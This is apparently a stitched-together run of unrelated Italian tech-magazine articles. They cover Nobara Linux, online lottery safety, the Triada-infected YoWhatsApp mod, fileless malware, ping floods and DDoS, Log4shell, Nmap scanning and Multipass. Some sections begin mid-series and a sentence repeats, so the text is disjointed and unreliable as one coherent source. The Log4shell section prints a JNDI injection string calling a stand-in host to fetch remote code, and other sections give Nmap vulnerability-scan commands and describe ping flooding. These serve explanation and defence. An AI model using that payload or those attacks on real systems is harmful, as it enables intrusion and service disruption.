Fedora è senza dubbio una distribuzione fantastica e popolare, ma non è molto facile da usare per gli utenti non esperti che cercano in Linux la stessa esperienza “punta e clicca” offerta da altri sistemi operativi. I pacchetti di terze parti o proprietari sono inoltre solitamente assenti da una nuova installazione. Secondo i creatori di Nobara, alcune delle cose importanti che mancano in Fedora, specialmente per quanto riguarda i giochi, sono le dipendenze di WINE, obs-studio, i pacchetti di codec di terze parti come quelli per gstreamer, i driver di terze parti come quelli di NVIDIA e anche piccole correzioni ai pacchetti. Nobara si propone di risolvere la maggior parte di questi problemi e di offrire una migliore esperienza per il gioco, lo streaming e la creazione di contenuti. Inoltre, vuole evitare che i nuovi utenti debbano necessariamente aprire il terminale, offrendo loro un’esperienza iniziale più intuitiva attraverso il mouse.

Ci sono tre versioni di Nobara: Official, GNOME e KDE. La prima è rivolta a chi ama le funzionalità di GNOME, ma preferisce il layout di KDE

Un progetto indipendente

Sebbene il progetto utilizzi i pacchetti, il codice e i repository di Fedora, è completamente indipendente da questa distribuzione. Ha il proprio gestore di pacchetti e i propri repository software in aggiunta all’offerta standard di Fedora e tutto è calibrato per soddisfare le esigenze di un nuovo utente orientato al gioco e alla multimedialità. Ci sono tre versioni di Nobara: Official, GNOME e KDE. L’unica differenza tra la ISO ufficiale e quella GNOME è che la prima ha delle estensioni preattivate che le conferiscono un aspetto estetico diverso. A parte offrire un ambiente desktop differente (GNOME con estensioni, GNOME standard e KDE), tutte e tre le versioni hanno pacchetti identici. La ISO ufficiale (testata qui) è rivolta a chi ama le funzionalità di GNOME ma preferisce il layout di KDE. Sono inoltre presenti varie ottimizzazioni ed estensioni per semplificare l’esperienza d’uso e aiutare chi si avvicina al mondo Linux provenendo da quello Windows. L’installazione è semplice e veloce. Dovete solo scaricare l’immagine ISO di installazione da questo link quindi avviarla, selezionare Install quando arrivate al desktop, rispondere ad alcune domande e il processo si completerà autonomamente. Al primo avvio potrebbe essere necessario installare altri codec video e audio. Fatto questo è tutto molto semplice e, che veniate da altri sistemi operativi o siate abituati a lavorare in Linux, non avrete problemi a orientarvi. Gli utenti più esperti possono scegliere la versione GNOME, più facilmente personalizzabile, e sfruttare tutte le migliorie e le scorciatoie per giocare al meglio e gestire senza sforzo ogni genere di contenuto.

Giocare online è qualcosa che facciamo ormai da tempo, anche se solo da pochi anni si è aperta la possibilità di ampliare questa possibilità anche alle lotterie o ai casinò, con l’utilizzo di soldi veri.

Era una pratica sicuramente possibile fin da prima, ma solo di recente la cosa è stata finalmente legalizzata e resa sicura dal controllo effettuato dagli enti preposti, tutelando così tutti gli appassionati del genere e facilitando la partecipazione, senza l’obbligo di presentarsi in ricevitoria.

Nel mondo delle lotterie, il più famoso è sicuramente il Lotto online, ma esistono molti tipi di siti simili anche all’estero, accessibili a chiunque. Ma in che modo è possibile assicurarsi della sicurezza di questi portali?

I rischi del gioco su siti non sicuri

Quando si tratta di dati personali non si scherza ed è sempre bene fare attenzione a quali portali andremo a inserirli. Nel mondo delle lotterie i rischi sono maggiori, dal momento che utilizziamo soldi veri per prendere parte al gioco e il pericolo di truffa e furto è dietro l’angolo.

È fondamentale affidarsi perciò a siti di cui già conosciamo la sicurezza o che possiamo verificare, per non rischiare di subire un furto di dati o di soldi.

Per prendere parte a questi giochi online è infatti richiesta una registrazione, dove è necessario inserire anche un documento di riconoscimento per accertare la maggior età del partecipante, e infine di ricaricare un portafoglio virtuale.

Questo significa rilasciare i propri dati e versare una somma di denaro che, non solo rischiano di essere rubati sul momento, ma il sito stesso potrebbe chiudere in qualsiasi momento, in quanto illegale, con conseguente perdita dei soldi investiti.

Quali sono i siti sicuri?

Il primo termine per riuscire ad avere la certezza che un sito sia sicuro o meno è quello di affidarsi ai canali ufficiali di lotterie di fama assicurata, come ad esempio il sito di gioco del Lotto Italia o, nel caso di lotterie all’estero, il gioco con rendita del Regno Unito e l’Euromillions in Francia.

Quest’ultimo infatti ha avuto un grande successo a livello europeo, partendo dalla Francia nel 2004, distribuendosi presto anche in Spagna, Regno Unito, Portogallo e altri Paesi Europei, fino a diventare una delle lotterie più giocate in Europa.

Ma, nonostante ci si possa fidare dei canali ufficiali, è sempre comunque bene prestare attenzione ad alcuni elementi che ci assicurano della fiducia che possiamo dare a queste piattaforme.

Per quanto riguarda i canali italiani, una certezza assoluta su cui possiamo fare affidamento è la certificazione ADM. Si tratta dell’ente preposto al controllo del gioco anche online, l’Agenzia delle Dogane e dei Monopoli.

Sulla homepage del sito in questione deve apparire la certificazione con il rimando al sito dell’agenzia, dove poter verificare la reale presenza di questo tra le piattaforme sotto la loro sorveglianza. Un sito certificato ADM è un sito legale e perciò assolutamente sicuro.

Conclusioni

Giocare alle lotterie online è possibile, grazie ad alcune garanzie che possono assicurarci della sicurezza del sito a cui ci stiamo iscrivendo.

È sicuramente un buon primo approccio quello di affidarsi solo ai canali ufficiali delle relative lotterie, ma nel caso delle piattaforme italiane è sufficiente verificare che ADM abbia rilasciato la propria certificazione che garantisce per quel sito un gioco legale e sicuro.

La mod si chiama YoWhatsApp e offre la possibilità di inviare numerosi formati di file (fino a 700MB), promette più privacy, nuovi font, un maggiore quantitativo di emoji e un funzionamento più veloce di WhatsApp stesso. Insomma, un bel “bocconcino” per chi usa il programma di messaggistica istantanea ogni giorno, soprattutto per lavoro. Ecco perché è diventata subito popolare, raccogliendo un bacino d’utenza alquanto significativo. Ora, cosa succede quando un prodotto software viene molto usato? Solitamente tende ad attirare le attenzioni di chi vorrebbe utilizzarlo quotidianamente. Purtroppo, e senza volerlo, strizza anche l’occhio ai programmatori di malware e alle organizzazioni criminali che si muovono per sfruttarlo al fine di raggiungere i loro scopi. Ecco spiegato, in poche parole, il perché della nascita di un nuovo dropper contenente il trojan Triada inserito all’interno di YoWhatsApp. Questa mod è stata categorizzata come “estremamente pericolosa”: pare che il trojan in questione sia in grado di iscrivere gli ignari utenti a servizi a pagamento senza il loro consenso…

Uno dei tanti banner pubblicitari che sponsorizzano l’installazione di YoWhatsApp.

Mod: Specchietti (appetibili) per allodole

WhatsApp è uno degli applicativi più utilizzati al mondo. Ed è proprio per questo motivo che nascono in continuazione app parallele e non ufficiali che lo riguardano. Si tratta perlopiù di software che aggiungono al programma ufficiale funzioni che non sono state ancora implementate dalla casa madre (Meta), ma che comunque risultano appetibili per la maggior parte degli utenti. Queste, in gergo anglosassone, vengono definite “WhatsApp mod”, ovvero app modificate e realizzate al fine di poter offrire ciò che WhatsApp ancora non offre. Sono app che vengono sviluppate da aziende o da programmatori indipendenti che, partendo dal codice originale, realizzano applicazioni simili, modificate con le funzioni aggiuntive compatibili con la piattaforma ufficiale. In altri termini, se si installa una di queste mod e si inizia a conversare con uno dei contatti che usa la versione originale, la chat funzionerà perfettamente! C’è da precisare, tuttavia, che a Meta non piace affatto che vengano utilizzate queste app, ed esse non sono ammesse né su Google Play Store né su Apple App Store, perciò si scaricano solo passando da store alternativi. Ma a cosa è dovuta questa reticenza nel permettere l’utilizzo delle WhatsApp mod? In primo luogo, alle funzionalità non ufficiali offerte che sono spesso immorali e, talvolta, illegali. Poi c’è anche da prendere in considerazione il fatto che ogni volta che si scarica da fonti alternative, si rischia di installare applicativi contenenti software malevolo, dannoso per lo smartphone. Inoltre, la maggior parte delle volte non si sa neanche chi le sviluppa e chi gestisce i nostri dati quando le usiamo.

Nel momento in cui scriviamo, sul sito ufficiale (www.yowhatsapp.net) è disponibile per il download la versione 9.52 dell’APK per device Android.

Come difendersi

A individuare il pericolo della mod YoWhatsApp sono stati gli esperti di Kaspersky e, sempre loro, hanno riportato in un report pubblicato sul loro sito dei consigli utili per evitare di cadere nella trappola. Il più banale è quello di non installare la mod in questione e di orientarsi solo su applicazioni presenti negli store ufficiali, senza prelevare file APK da altri siti. Stando all’articolo, infatti, l’applicazione viene sponsorizzata su altri portali e app Android. Bisogna poi ricordare che, nel caso si fosse già installata, questa va subito rimossa, per evitare che vengano sottratte le chiavi di WhatsApp, cosa che la versione 2.22.11.75 dovrebbe essere in grado di compiere. Sempre in base a ciò che dice Kaspersky, l’app modificata è capace di inviare le chiavi d’accesso al server remoto dello sviluppatore. Infine, occhio anche alla mod WhatsApp Plus, che potrebbe contenere la stessa tipologia di codice malevole.

L’installazione di YoWhatsApp deve avvenire scaricando e lanciando l’APK: l’app non è infatti presente sugli store ufficiali di Google e Apple.

Se pensiamo a un attacco informatico, diamo quasi sempre per scontato che alla base vi sia l’infezione di un file, sia esso l’eseguibile di un’applicazione, una libreria di sistema, un documento specifico (XLSX, PDF, ecc.), un elemento quindi con una chiara e ben definita impronta digitale permanente. In realtà esistono malware in grado di infettare un sistema senza necessariamente sfruttare file intermediari, sono in gergo conosciuti come fileless malware e sono ben noti agli esperti di sicurezza informatica da oltre un ventennio. Non lasciando specifiche tracce da rilevare all’interno di un file, questo tipo di malware risulta particolarmente subdolo perché difficilmente scovabile dagli antivirus. In questo articolo, oltre ad esaminare alcune delle metodologie di rilevamento più all’avanguardia, vedremo anche quali sono i fileless malware più noti e come agiscono per portare a termine gli attacchi per cui sono stati programmati.

Come funzionano?

Un malware che non sfrutta i file si affida a ogni altra componente della macchina vulnerabile, o resa tale, per annidarsi e sferrare l’attacco: memoria, firmware (di dispositivi di storage, schede di rete…), BIOS, protocolli e finanche la CPU; una volta annidati, tali malware compiono quelle che tecnicamente sono chiamate operazioni di memory code injection, ovvero l’injection di codice malevolo nella memoria di una specifica applicazione o processo in esecuzione, senza quindi sfruttare nessun file e in modo del tutto trasparente all’utente. L’attacco iniziale avviene proponendo all’utente il download di software malevolo, inviando e-mail di phishing o link a pagine web infette. I malware sono tutti progettati per scaricare in memoria del PC codice infetto (payload) in grado di caricare da remoto script malevoli che generalmente dialogano con applicazioni sicure già installate nel proprio PC e che quindi vengono eseguiti a insaputa dell’utente durante la normale esecuzione di script legittimi (infiltrazione laterale). Tra le applicazioni più utilizzate dagli hacker si segnalano Microsoft PowerShell e Windows Management Instrumentation.

La macro Word che il malware PowerSniff attiva per scaricare uno script malevolo da iniettare in Microsoft Powershell.

I fileless malware che conosciamo

Il 13 luglio del 2001 venne individuato il primo malware di tipo fileless, attaccava i computer con installato Internet Information Services di Microsoft mostrando sulla homepage dei siti gestiti da IIS la scritta “Welcome to http://www.worm.com ! Hacked by Chinese!”. L’infezione, avvenuta sfruttando un buffer overflow di IIS, si propagò fino a raggiungere ben 359mila server. Il malware venne scoperto da Marc Maiffret e Ryan Permeh, dipendenti in forza alla eEye Digital Security. Fu battezzato Code Red per via della bibita, la Mountain Dew Code Red, che i due stavano sorseggiando durante la scoperta. Negli anni successivi la stessa tecnica di attacco è stata impiegata per colpire altri sistemi, nel 2003 il worm SQL Slammer prese di mira Microsoft SQL Server per lanciare attacchi di tipo denial-of-service, nel 2013 il trojan Lurk seminò il panico tra le banche sottraendo diverso denaro. Anche il registro di configurazione di sistema di Windows viene spesso impiegato come tramite per sferrare attacchi di tipo fileless e passare inosservato ai controlli, è il caso del trojan Poweliks, scovato nel 2014. Il malware, divulgato come allegato di posta elettronica di tipo Microsoft Word, salva uno script malevolo codificato nel Registro di Windows (impiegando Microsoft Powershell). Il payload progettato dagli hacker consente di scaricare ed eseguire da remoto altro codice malevolo.
A metà del 2015, nel corso di una conferenza stampa tenutasi a Londra, Kaspersky Labs rivelò di essere stata attaccata da un malware denominato Duqu 2.0. Gli hacker avrebbero agito indisturbati per mesi sulle reti di Kaspersky; l’ipotesi è che stessero facendo un’operazione di ricognizione e ricerca, nella speranza di saperne di più sulle tecnologie di sicurezza messe inm atto dall’azienda. Anche Duqu 2.0 svolge i suoi attacchi malevoli quasi esclusivamente nella memoria della macchina attaccata. Nel 2016, Josh Grunzweig e Brandon Levene della Palo Alto Networks – multinazionale americana di sicurezza informatica con sede a Santa Clara, in California – documentarono l’escalation del malware PowerSniff; distribuito alle vittime tramite e-mail con allegato un documento Microsoft Word, l’attivazione della macro in esso contenuta scarica nel sistema uno script PowerShell in grado di decodificare ed eseguire ulteriori payload dannosi, tutto questo operando esclusivamente in memoria e salvando temporaneamente una DLL dannosa nel file system. Quasi contemporaneamente, Mike Sconzo e Rico Valdez ricercatori della Carbon Black individuarono il ransomware PowerWare operante, grosso modo, alla stessa maniera di PowerSniff. Negli ultimi anni i malware di tipo fileless si sono evoluti sfruttando nuove tecniche e diventando uno degli attacchi informatici più utilizzati dai cybercriminali.

I tool usati dai cybercriminali e come proteggersi

Così come esistono in circolazione applicazioni che consentono agli hacker di sviluppare agevolmente software malevoli, per i malintenzionati sono disponibili anche tool che permettono di sviluppare malware di tipo fileless. Tra i toolkit più impiegati dai cybercriminali: PowerSploit, PowerShell Empire e Cobalt Strike, nato come software di cyber security e diventato uno dei tool preferiti dai cyber criminali per sferrare attacchi malevoli. La protezione da malware di tipo fileless non può passare dai soli software antivirus, che cercano “impronte” del virus nei file, sono necessarie applicazioni in grado di agire a più ampio raggio, per tale motivo nel tempo sono state introdotte specifiche tecniche, ad esempio basate sulla firma dei file eseguibili del sistema operativo. A tale metodologia – soprattutto in ambito aziendale – si affiancano sistemi di endpoint protection e di monitoraggio in tempo reale del traffico di rete.

Nell’aprile 2020, la European Union Agency for Cybersecurity (ENISA) pubblicò un rapporto in cui mostrò che gli attacchi malware di tipo fileless hanno una probabilità dieci volte maggiore di riuscire rispetto a un attacco convenzionale.

Nel mondo degli hacker ci sono stati grandi cambiamenti e la cultura di imparare a intervenire nei computer in modo innovativo per il piacere di farlo si è un po’ persa. Per esempio, se cercate su Google risorse su come hackerare non troverete probabilmente informazioni utili, ma ogni sorta di spam e link di phishing che non vi consigliamo di toccare, neanche con JavaScript disattivato. Tuttavia ci sono molte risorse valide per imparare a fare ricognizioni di rete, test di penetrazione e persino per utilizzare le tecniche di phishing. Siti come https://tryhackme.com, per esempio, vi insegneranno queste abilità con l’obiettivo di insegnarvi a difendervi da esse. TryHackMe rende divertente il processo di apprendimento attraverso la gamification delle esercitazioni, in alcuni casi regalandovi delle macchine virtuali da scaricare e penetrare. Ci sono lezioni, laboratori e concorsi che vi aiuteranno a imparare di tutto, da Metasploit a Maltego. Una parte importante della cultura hacker è rappresentata dalle sfide Capture The Flag (CTF). Chiamato in italiano rubabandiera, il CTF è un gioco tradizionale in cui le squadre competono per cercare di catturare le bandiere dalle basi avversarie e riportarle alla propria. Nella versione hacker, invece, si tratta semplicemente di trovare le “bandiere” (a volte solo file vuoti chiamati flag, altre volte oggetti più interessanti) nascoste da chi ha lanciato la sfida.

Armitage è una GUI per Metasploit. Per utilizzarla, avviate Metasploit Framework dal menu System Service

Un’inondazione di ping

Abbiamo iniziato con il Ping of Death, quindi concludiamo con l’attacco Ping Flood. Invece di un singolo pacchetto malevolo, viene trasmesso un numero enorme di pacchetti di dimensioni legittime. L’idea è quella di sopraffare il computer target inviando più ping di quanti ne possa gestire. Sia il Ping of Death sia il Ping Flood fanno parte dell’ampia categoria degli attacchi Denial of Service (DoS). Su Linux alcune funzioni del comando ping sono disponibili solo per l’utente root. Un esempio è l’opzione -f o flood, che se usata da sola invia le richieste di eco il più velocemente possibile. Se l’aggressore dispone di una larghezza di banda significativamente maggiore e il difensore non ha un firewall che previene gli attacchi DoS, è possibile che un computer ne paralizzi un altro in questo modo. È più comune, tuttavia, che un hacker utilizzi diversi host per inviare i ping, sferrando un attacco DDoS (Distributed Denial of Service o Denial of Service distribuito). L’attacco è in genere effettuato da una botnet sotto il controllo dell’hacker. I gruppi di criminalità informatica possono affittare sezioni di un gruppo di macchine zombie che hanno creato o usarlo direttamente e la banda a disposizione è enorme. Nel 2016 il provider DNS Dyn è stato mandato offline (rendendo inaccessibili molti siti Web popolari) a causa del malware Mirai, che infetta principalmente i dispositivi IoT utilizzando credenziali predefinite. La larghezza di banda totale di questo attacco è stata stimata intorno a 1,2 Tbps. Nel novembre 2021, Microsoft ha rivelato di aver sventato il più grande attacco DDoS della storia, a ben 3,47 Tbps. Si tratta di una quantità di dati 3.000 volte superiore a quella di una LAN gigabit. La vulnerabilità di Log4shell sfruttava l’input non sanificato e poteva arrivare a consentire l’esecuzione di codice remoto. Tutto ciò che un utente malintenzionato doveva ottenere era far sì che un messaggio accuratamente creato, come:

${jndi:ldap://example.com/bad_file}

fosse scritto in un file di log. Come Bash, Log4j esegue la sostituzione delle stringhe sulle espressioni tra parentesi graffe. Nelle giuste circostanze, il contenuto di /bad_file potrebbe essere eseguito immediatamente sul server. Oppure il log può essere elaborato su un altro server e /bad_file può essere eseguito lì in un secondo momento. Se l’esecuzione del codice viene evitata, un aggressore può comunque far sì che la macchina vulnerabile invii dati (come variabili d’ambiente o contenuti di moduli) alla sua.

Un falso senso di sicurezza

In questo caso si abusa della capacità di Java Naming and Directory Interface (JNDI) di recuperare risorse tramite LDAP, ma è possibile utilizzare altri protocolli. Di conseguenza, poco dopo la prima falla ne sono state scoperte altre, e sono state inizialmente diffuse numerose mitigazioni incomplete, che hanno creato un falso senso di sicurezza. Una volta compromesse, le macchine venivano inserite in botnet, paralizzate da ransomware oppure sfruttate per il mining di criptovalute. È interessante che l’attacco Dyn sia stato attribuito (anche se non in modo definitivo) a giocatori scontenti di Minecraft, come anche Log4j. Infatti, per sfruttare Log4j su un server Minecraft vulnerabile, tutto ciò che si doveva fare era postare nella chat lo snippet di codice che abbiamo riportato. Da lì veniva processato da Log4j e, se si verificavano varie condizioni, l’attaccante poteva eseguire del codice. Con questo si conclude il nostro speciale sugli hacker. Naturalmente abbiamo appena scalfito la superficie dell’argomento e abbiamo visto solo una parte della fantastica selezione di strumenti di Parrot, ma speriamo che abbiate imparato qualcosa. Noi sicuramente sì! Come ultimo esperimento abbiamo preso in considerazione un vecchissimo nostro sito in Drupal. Poiché siamo appassionati di storia digitale, abbiamo archiviato la maggior parte di esso in una macchina virtuale e, dato che oggi parliamo di toolkit per hacker, abbiamo pensato di provare a violarla. Nmap ha rivelato che stava eseguendo il seguente antico software: ProFTPD 1.3.1, Apache 2.2.31, OpenSSH 4.7p1 e Subversion (nessun numero di versione rilevato). Per quanto ci abbiamo provato, però, nessuno dei nostri exploit ha funzionato. Abbiamo usato ZAP (Zed Attack Proxy) di OWASP (Open Web Application Security Project, https://owasp.org) per cercare di attaccare i vecchi moduli di archivio, ma senza successo. ZAP funziona impostando un proxy person in the middle in grado di manipolare le richieste perché vengano inviate al server Web in esame e di ispezionare le risposte. Abbiamo anche provato Metasploit, che meriterebbe un intero articolo a sé stante. Tuttavia il fantasma della nostra macchina, a quanto pare, è inviolabile. A  dimostrazione che, nel mondo degli hacker, bisogna sempre aspettarsi l’impossibile.

Wireshark è in grado di sniffare quasi tutti i pacchetti sulla vostra LAN

Anche se il comando ping è un buon inizio, per la ricognizione della rete e la scansione delle porte non c’è niente di meglio di Nmap. Dal momento che avete già un elenco XML di macchine sulla vostra LAN, sarebbe bello poterlo riutilizzare per evitare di ripetere la scansione. Purtroppo, i file XML generati da Nmapsi4 non possono essere facilmente gestiti da Nmap stesso. Aprite quindi un terminale e fatelo manualmente. Per iniziare, basta inserire:

$ sudo nmap 192.168.0.0/24

Esegue la scansione della rete locale come prima, ma invece di pingare le macchine, sonda le 1.000 porte di servizio più comuni su ognuna di esse e dice se ce n’è qualcuna in ascolto. Inoltre, se lo si esegue come root, fornisce alcune informazioni aggiuntive su ogni host come l’indirizzo MAC e il produttore. È il nostro metodo preferito in redazione per trovare gli indirizzi IP delle Raspberry Pi sulle nostre reti domestiche. Dal momento che nella maggior parte dei dispositivi è abilitato l’SSH, è sufficiente eseguire la scansione della porta 22:

$ sudo nmap -p22 192.168.0.*

Come si può vedere, a Nmap non importa se si preferiscono i caratteri jolly o le maschere di subnet. La Pi 4 utilizza un adattatore Ethernet diverso da quello dei suoi predecessori, quindi non viene visualizzato come Raspberry Pi Foundation.

Una volta individuata la rete, fate clic su Scan Options per avviare una scansione più approfondita delle macchine

Individuare i servizi in esecuzione

Lasciamo ora le Pi e consideriamo i servizi in esecuzione sulla vostra rete. I risultati della scansione precedente possono rivelare host che eseguono SSH, interfacce Web, desktop remoti (VNC/RDP) e altro. I servizi in esecuzione potrebbero essere diversi da quelli elencati: sono solo ipotizzati in base al numero di porta in questa fase. Considerate ora il vostro router domestico. Quasi certamente sarà in esecuzione un pannello di controllo Web sulla porta 80, ma potrebbero essere attivi anche molti altri servizi. Per eseguire la scansione di ogni singola porta si può utilizzare il comando:

$ sudo nmap -p1-65535 192.168.0.1

Tuttavia, questo approccio non è il migliore. La scansione SYN predefinita di Nmap non è veloce per le porte chiuse e può intervenire una serie di ostacoli. Il tempo di completamento previsto nel nostro caso era di quasi un giorno, quindi abbiamo cambiato strumento. Masscan (Information Gathering > Network & Port Scanners) ha impiegato solo 15 minuti per dirci che non riusciva a trovare alcun servizio in esecuzione su porte oscure. Finora abbiamo spiato silenziosamente la rete con Etherape, abbiamo usato Nmap per trovare tutti gli host e ora stiamo scegliendo un host e facendo ispezioni approfondite. Si può utilizzare Nmap anche per eseguire il rilevamento della versione del sistema operativo e del servizio, anche se a volte si tratta di congetture se si incontrano impronte digitali sconosciute. I risultati della scansione precedente hanno indicato che il nostro router potrebbe avere un pannello di controllo Web in esecuzione sulla porta 80 e un server UPnP in esecuzione sulla porta 5000. Modificate i numeri qui sotto per adattarli alla vostra situazione. Eseguire $ nmap -A -p80,5000 192.168.0.1 ci ha rivelato che il server Web era Lighttpd e l’altro era MiniUPnpd. Il fatto che il router abbia tanti servizi in esecuzione non è necessariamente preoccupante di per sé. Abbiamo analizzato solo l’interfaccia LAN, cioè quella interna. Se ci fossero così tante porte aperte dall’esterno, sarebbe un problema. Per eseguire la scansione dall’esterno è necessario sapere l’indirizzo IP esterno, che è facile da trovare utilizzando un sito Web come https://ipinfo.io. Lo sfruttamento di un servizio vulnerabile è di solito un passo fondamentale in qualsiasi attività informatica illecita. L’anno scorso la vulnerabilità Log4shell in un framework Java ha compromesso migliaia di applicazioni, dai container Elasticsearch ai server di Minecraft. Sfortunatamente, molti server rimangono senza patch non solo per la disattenzione di alcuni amministratori, ma anche perché Log4j (il framework vulnerabile) è spesso sepolto nelle dipendenze delle principali applicazioni.

Scandagliare più a fondo con Nmap

Oltre alla ricognizione della rete e alla scoperta dei servizi, Nmap è in grado di fare ulteriori analisi. Grazie al suo potente motore di scripting (NSE o Nmap Scripting Engine), è possibile organizzare ogni sorta di attività personalizzata. Uno degli script più utili è quello fornito dal gruppo di analisi di sicurezza Vulners.com. Sfrutta la capacità di Nmap di rilevare le versioni dei servizi in esecuzione, insieme ai database delle vulnerabilità note, per indicare in modo dettagliato quali debolezze potrebbero affliggere il computer target. Per curiosità, abbiamo indagato sul server UPnP in esecuzione sul nostro router:

$ nmap -p 5000 -A –script vulners 192.168.0.1

Siamo rimasti sbigottiti quando abbiamo trovato nell’output quanto segue:

| vulners:

| cpe:/a:miniupnp_project:miniupnpd:1.9:

…

| EDB-ID:43501 7.5 https://vulners.

com/exploitdb/EDB-ID:43501 *EXPLOIT*

| CVE-2017-8798 7.5 https://vulners.

com/cve/CVE-2017-8798

I link ci hanno indicato che si trattava di un errore di firma degli interi nelle versioni 1.4-2.0 del client MiniUPnP e che i sistemi vulnerabili potevano essere sfruttati con un attacco Denial of Service. Anche se sarebbe stato divertente giocare con il codice Proof of Concept (PoC) a cui si fa riferimento in quei link, sarebbe stato inutile, perché si tratta di una vulnerabilità del programma client, non del server. Si tratta di una distinzione importante, perché il port scanning in generale può indicare solo i servizi vulnerabili sull’host. Potrebbero esserci molte altre vulnerabilità in altri software in esecuzione sul computer (e anche nella persona che lo utilizza) ma Nmap non può aiutarvi in questo senso. Questi script controllano solo le informazioni sulla versione, quindi vedere un output simile a quello sopra riportato non dovrebbe essere motivo di panico immediato. Ricordatevi che le vulnerabilità possono riguardare solo alcune funzioni di alcuni programmi in esecuzione in determinate configurazioni. Ma vale sempre la pena di indagare, ed è qui che strumenti come Pompem (vedi Pentesting > Exploitation Tools > Exploit Search) si rivelano utili.

Nel menu Pentesting ci sono numerosi strumenti accuratamente suddivisi in categorie. Nmap è il primo tool di scansione da utilizzare

Agli sviluppatori piace poter avviare rapidamente delle macchine virtuali per i test ma quando scrivono codice su piattaforme diverse diventa un po’ più complesso farlo usando differenti stack di virtualizzazione. Ubuntu fornisce però una soluzione per creare VM veloci e “usa e getta” su computer basati su processori Intel che è anche supportata dai nuovi dispositivi con chip Apple M1, seppure con alcune limitazioni. Si chiama Multipass ed è un front-end per avviare macchine virtuali, ma può supportare molti back-end diversi, tra cui Virtual Box, LXD, KVM e altri. L’installazione di Multipass in Linux richiede che sia presente Snap:

$ sudo snap install multipass

$ sudo snap info multipass

Trovate le istruzioni per l’installazione in Windows e macOS all’indirizzo https://multipass.run. Multipass è disponibile sia a riga di comando sia con un’interfaccia grafica rudimentale. Qui utilizzeremo la versione a riga di comando perché offre una maggiore flessibilità. Al termine dell’installazione dello strumento, è consigliabile riavviare il sistema.

Primi passi con Multipass

Per iniziare a usare Multipass, aprite una finestra del terminale e usate il seguente comando:

$ multipass launch

 Scaricherà e creerà una nuova macchina virtuale con un nome generato dinamicamente. La prima volta, la creazione di una VM potrebbe richiedere qualche istante, perché bisogna scaricare l’immagine di base di Ubuntu. Per impostazione predefinita, il tool utilizzerà l’ultima immagine di Ubuntu server disponibile per l’uso in Multipass sulla piattaforma su cui è in esecuzione. Questa prima macchina virtuale è speciale ed è contrassegnata come istanza primaria. Di default (in Linux) l’istanza primaria monta anche la cartella Home dell’utente. Nella macchina virtuale viene visualizzata come una cartella denominata Home all’interno della directory Home esistente, quindi potete accedere ai file come se facessero parte del normale filesystem. Le macchine virtuali aggiuntive richiedono un ulteriore comando:

$ multipass mount $HOME

lfexample4 /home/home

È possibile avere più mount su una stessa macchina virtuale e non è necessario esportare i mount in una variabile. Si possono sostituire le variabili con dei percorsi: per esempio, $HOME potrebbe essere Downloads per esporre alla VM solo la cartella degli scaricamenti. Lo smontaggio si effettua utilizzando il comando unmount : multipass umount lfexample4 / home/home. Si può accedere alla macchina virtuale primaria anche tramite una console grafica, aprendo il menu a tendina e selezionando open shell. Altri modi per ottenere una shell nella VM includono il comando Multipass shell che si può usare per eseguire una shell BASH interattiva, come segue: $ multipass shell lfexample. Una volta all’interno della shell, la macchina virtuale può essere trattata come qualsiasi altra. Sono disponibili tutti i soliti comandi. Ad esempio, per installare Apache basta usare: $ sudo apt-get install apache2. Utilizzando un browser per collegarsi all’indirizzo IP della macchina virtuale si visualizza la pagina di installazione predefinita di Apache. Ottenere un elenco di tutte le macchine in esecuzione è semplice:

$ multipass list –all

Regolare le risorse

Per impostazione predefinita, Multipass fornisce una quantità modesta di RAM e CPU alle nuove macchine virtuali: un solo core della CPU e 1GB di RAM. Fortunatamente è facile dare più risorse alla VM. In questo esempio le abbiamo fornito 4GB di RAM e due core della CPU. È anche possibile utilizzare questi interruttori quando si crea la macchina virtuale primaria, se si vuole: $ multipass launch -c 2 -m 4G –name lfexample2. L’opzione -c si riferisce al numero di core della CPU e -m è per la memoria. Quest’ultima si aspetta un’unità di misura dopo il numero, che sia k per Kilobyte, m per Megabyte o g per Gigabyte. Le stesse opzioni personalizzate sono disponibili usando l’opzione -d per il dimensionamento del disco. Per tenere traccia delle macchine virtuali create basta usare multipass list che ne visualizza il nome, cosa eseguono, gli indirizzi IP e il sistema operativo in uso. Per ottenere ulteriori informazioni su una macchina virtuale, utilizzate il parametro info e il suo nome, come mostrato di seguito. Questa operazione consente di vedere i dettagli hardware e software delle macchine virtuali: $ Multipass info lfexample2. Potreste aver notato che gli indirizzi IP non si trovano sulla rete locale. Questo perché per impostazione predefinita utilizzano il NAT (Network Address Translation ovvero traduzione degli indirizzi di rete). In altre parole, si trovano in una rete privata che può raggiungere Internet. Sono invisibili a tutto il resto della rete. Per cancellare i due esempi che abbiamo creato (e trattare l’arresto e l’avvio) ci sono dei parametri di Multipass da utilizzare, come $ multipass stop <nome vm> oppure $ multipass start <nome vm> . Dopo l’arresto, utilizzate il comando $ multipass delete <nome vm>. Non chiede conferma e cancella la macchina virtuale. Per recuperare una VM che è stata eliminata, utilizzate invece il comando $ multipass recover <VM cancellata>.